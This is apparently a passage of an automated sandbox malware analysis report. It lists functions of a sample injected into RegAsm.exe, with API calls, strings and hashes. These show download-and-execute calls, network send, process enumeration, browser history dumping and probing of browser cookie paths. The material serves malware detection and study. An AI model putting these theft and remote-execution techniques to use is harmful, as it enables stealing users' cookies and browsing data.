                                                        • Opcode ID: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                        • Instruction ID: 0b88db63cd78dea0703aeaf814a7171c31f7e2e6e0b1944ffb711cb25cf7542c
                                                        • Opcode Fuzzy Hash: 7fe6fe9ce11b1ae804115fcba13355f31785efbed8ffac05f5782df1f2ab6211
                                                        • Instruction Fuzzy Hash: B4E04872904315E7E31027B5EC4DDAB7B7CE745713B100266FA12915D39A749C40C6B5
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044139A Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                        • Instruction ID: 3288ceb70b28299b768e57bc56a65f905b411dc47ae91625c595fe6b39b3afde
                                                        • Opcode Fuzzy Hash: d82b14c4b7eddcab2a525b8a5736e815382cccc6b286473e45e20a4a09cb7dcc
                                                        • Instruction Fuzzy Hash: 4D71C431900256ABEF21CF55C884AFFBBB5EF95350F14012BE812A72A1D7748CC1CBA9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00444CFB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • _free.LIBCMT ref: 00444E06
                                                        • _free.LIBCMT ref: 00444E1D
                                                        • _free.LIBCMT ref: 00444E3C
                                                        • _free.LIBCMT ref: 00444E57
                                                        • _free.LIBCMT ref: 00444E6E
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 3033488037-0
                                                        • Opcode ID: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                        • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                                        • Opcode Fuzzy Hash: 40f9e7cc2be6d4603e073625857eb528f872492eb2fa809e82d56bfb9c8f3841
                                                        • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                        • _free.LIBCMT ref: 004493BD
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00449589
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                        • String ID:
                                                        • API String ID: 1286116820-0
                                                        • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                        • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                                        • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                                        • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                                          • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                                          • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                        • String ID:
                                                        • API String ID: 4269425633-0
                                                        • Opcode ID: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                                        • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                                        • Opcode Fuzzy Hash: 050d440512ad4bd2d5c4b985fe1e5d11bc0defa287e01fcc1b5db6667af7a0db
                                                        • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                        • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                                        • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                                        • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0045112C Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01), ref: 00451179
                                                        • __alloca_probe_16.LIBCMT ref: 004511B1
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD01,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?), ref: 00451202
                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD01,0042DD01,?,00000002,00000000), ref: 00451214
                                                        • __freea.LIBCMT ref: 0045121D
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID:
                                                        • API String ID: 313313983-0
                                                        • Opcode ID: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                                        • Opcode Fuzzy Hash: c0c27e3fa0fc37b5352cac75d9871c7cd610c85ad5d081213d6c80f72d2fc676
                                                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                                        • _free.LIBCMT ref: 0044F3BF
                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                        • String ID:
                                                        • API String ID: 336800556-0
                                                        • Opcode ID: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                        • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                                        • Opcode Fuzzy Hash: be8aad2c18c16d35f713b979a96ac7f1c772162f60e003adf0fa877a85dcd87d
                                                        • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BC87,00000000,00000000,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044829E
                                                        • _free.LIBCMT ref: 004482D3
                                                        • _free.LIBCMT ref: 004482FA
                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448307
                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448310
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                        • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                                        • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                                        • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 004509D4
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 004509E6
                                                        • _free.LIBCMT ref: 004509F8
                                                        • _free.LIBCMT ref: 00450A0A
                                                        • _free.LIBCMT ref: 00450A1C
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                        • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _free.LIBCMT ref: 00444066
                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                        • _free.LIBCMT ref: 00444078
                                                        • _free.LIBCMT ref: 0044408B
                                                        • _free.LIBCMT ref: 0044409C
                                                        • _free.LIBCMT ref: 004440AD
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                        • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406EB0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: DownloadExecuteFileShell
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe$open
                                                        • API String ID: 2825088817-1632494013
                                                        • Opcode ID: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                        • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                                        • Opcode Fuzzy Hash: d08d3887d54a038e956607be4ed5306b9f9ca79097eafe3ebd10aa0618e8ef3a
                                                        • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strpbrk.LIBCMT ref: 0044E738
                                                        • _free.LIBCMT ref: 0044E855
                                                          • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD1B
                                                          • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD3D
                                                          • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                        • String ID: *?$.
                                                        • API String ID: 2812119850-3972193922
                                                        • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                        • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                                        • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                                        • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                          • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C52A
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                        • String ID: XQG$NG$PG
                                                        • API String ID: 1634807452-3565412412
                                                        • Opcode ID: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                                        • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                                        • Opcode Fuzzy Hash: fa8e6cd71303f921af7aa315b6e572632f3cab55c95f2ef26eb534f0bd843a50
                                                        • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: `#D$`#D
                                                        • API String ID: 885266447-2450397995
                                                        • Opcode ID: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                        • Instruction ID: d0478598ef992627c852fcfbe86add3ca1c9fa58067414995f231753f3186543
                                                        • Opcode Fuzzy Hash: 36fac044672f79bbd2692348072d6fa41419b258ac2755bfc370d2617ef2a991
                                                        • Instruction Fuzzy Hash: 78519071A00208AFDF18DF59C980AAEBBB2FB94314F59C19AF81897361D7B9DD41CB44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00443435 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443475
                                                        • _free.LIBCMT ref: 00443540
                                                        • _free.LIBCMT ref: 0044354A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
                                                        • API String ID: 2506810119-472202380
                                                        • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                        • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                                        • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                                        • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                          • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,65B51986,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5), ref: 0041857E
                                                          • Part of subcall function 00418568: CloseHandle.KERNEL32(t^F), ref: 00418587
                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                        • Sleep.KERNEL32(000000FA,00465E74), ref: 00404138
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                        • API String ID: 368326130-3219657780
                                                        • Opcode ID: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                        • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                                                        • Opcode Fuzzy Hash: 765a2cec5dfc93fc14e6a06a83629ca65ec94325b3245c099cb6fcf10de14a30
                                                        • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SystemParametersInfoW.USER32 ref: 0041CAD7
                                                          • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                          • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                          • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCreateInfoParametersSystemValue
                                                        • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                        • API String ID: 4127273184-3576401099
                                                        • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                        • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                        • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                        • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _wcslen.LIBCMT ref: 004162F5
                                                          • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                                                          • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                                                          • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                                                          • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _wcslen$CloseCreateValue
                                                        • String ID: !D@$okmode$PG
                                                        • API String ID: 3411444782-3370592832
                                                        • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                        • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                                                        • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                                                        • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                                                        Strings
                                                        • User Data\Default\Network\Cookies, xrefs: 0040C603
                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                                                        Memory Dump Source
                                                        • Source File: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExistsFilePath
                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                        • API String ID: 1174141254-1980882731
                                                        • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
